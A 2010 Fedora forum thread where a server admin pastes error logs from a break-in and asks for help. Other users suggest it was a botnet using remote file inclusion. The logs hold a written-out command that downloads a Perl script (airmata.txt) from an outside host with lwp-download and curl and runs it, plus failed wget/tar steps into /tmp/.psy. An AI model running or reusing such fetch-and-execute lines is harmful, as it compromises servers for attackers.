sh: ./config: No such file or directory
sh: ./config: No such file or directory
sh: ./****: No such file or directory
sh: ./****: No such file or directory
sh: ./run: No such file or directory
sh: ./run: No such file or directory
sh: wget: command not found
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: line 0: cd: /tmp/.psy: No such file or directory
sh: wget: command not found
sh: ./config: No such file or directory
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: ./****: No such file or directory
sh: line 0: cd: /tmp/.psy: No such file or directory
sh: ./config: No such file or directory
sh: ./****: No such file or directory
sh: ./run: No such file or directory
sh: ./run: No such file or directory
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://picko.polopalo.com/airmata.txt??;perl airmata.txt;curl -O http://picko.polopalo.com/airmata.txt -O airmata.txt;perl airmata.txt'
sh: -c: line 0: syntax error near unexpected token `<'
[...]
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://picko.polopalo.com/airmata.txt -O airmata.txt;curl -O http://picko.polopalo.com/airmata.txt -O airmata.txt;perl airmata.txt'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://picko.polopalo.com/airmata.txt -O airmata.txt;curl -O http://picko.polopalo.com/airmata.txt -O airmata.txt;perl airmata.txt'
17th July 2010, 03:15 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
Re: finding the source of a break in
Sometimes I see a lot, a lot, a lot of <defunct> threads, usually when I kill some CPU-eating processes. ...
Code:
IP address: 89.208.121.194
No host name is associated with this IP address or no reverse lookup is configured.
Error:Host not found
89.208.121.194 is from Russian Federation(RU) in region Eastern Europe
I could not get ps to show what is triggered from where, ..
It seems to me now that my server was used for some wide-range attack or something, from some Russian IP. ... Since the re-install things probably don't work so well for them, but I still have some zombie processes starting up and trying to do their job. ...
Whatever is left, it must be somewhere in my users' data .. which will be very hard to trace down.
Any suggestions welcome. Thank you very much.
Last edited by LaKing; 17th July 2010 at 03:19 PM.
17th July 2010, 11:02 PM | Banned | Join Date: Oct 2009 | Posts: 358
Re: finding the source of a break in
Quote:
Originally Posted by LaKing
It seems for me now, that my sever was used to some wide range attack or something, from some Russian IP.
botnet.
Quote:
Originally Posted by LaKing
Whatever is left, it must be somewhere in my user's data .. which will be very hard to trace down.
grep it. Maybe start with some of the offending addresses but without isolating the problem by de-activating all user accounts and then activating each user account individually until you find the culprit(s) and look through their data, it is a bit like needle + haystack grepping for evidence.
Thanks,
Zanpactou
18th July 2010, 01:15 AM | Guest | Posts: n/a
Re: finding the source of a break in
Quote:
Originally Posted by Zanpactou
Look at his top output. perl.
Gah. That's just collateral. I doubt it's more than a simple RFI. So the chance it was done in Perl as opposed to PHP is about 1 in 1M.
---------- Post added at 04:15 PM CDT ---------- Previous post was at 04:14 PM CDT ----------
Quote:
Originally Posted by LaKing
Any suggestions welcome.
Please read http://forums.fedoraforum.org/showpo...91&postcount=3 .
18th July 2010, 10:20 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
Re: finding the source of a break in
For now I added this IP to my /etc/hosts.deny file, since then, no new thread started, and everything looks OK at the moment. ...
... thanks guys.